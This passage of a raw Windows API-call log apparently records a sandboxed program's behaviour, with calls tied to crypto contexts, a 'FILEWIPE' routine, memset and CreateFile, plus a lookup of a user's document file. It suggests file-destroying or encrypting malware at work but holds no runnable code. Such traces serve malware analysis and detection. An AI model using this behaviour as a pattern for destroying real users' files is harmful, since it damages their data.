[0178.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.914] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.914] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.914] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.914] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.914] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0178.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.914] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.914] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0178.914] FreeLibrary (hLibModule=0x74f20000) returned 1 [0178.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.914] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.914] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.915] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.918] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.920] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.920] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0178.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.920] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.920] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\g4FThfJBWB6.odt", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 0x90af58 [0178.920] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0178.921] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.921] CharLowerBuffW (in: lpsz="byte[4237]", cchLength=0xa | out: lpsz="byte[4237]") returned 0xa [0178.921] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.921] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0178.921] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.921] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0178.921] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c27c8 [0178.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c27c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.921] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.922] FreeLibrary (hLibModule=0x75c90000) returned 1 [0178.922] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0178.922] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0178.922] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0178.922] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.922] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.923] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.924] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.925] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0178.928] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0178.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: 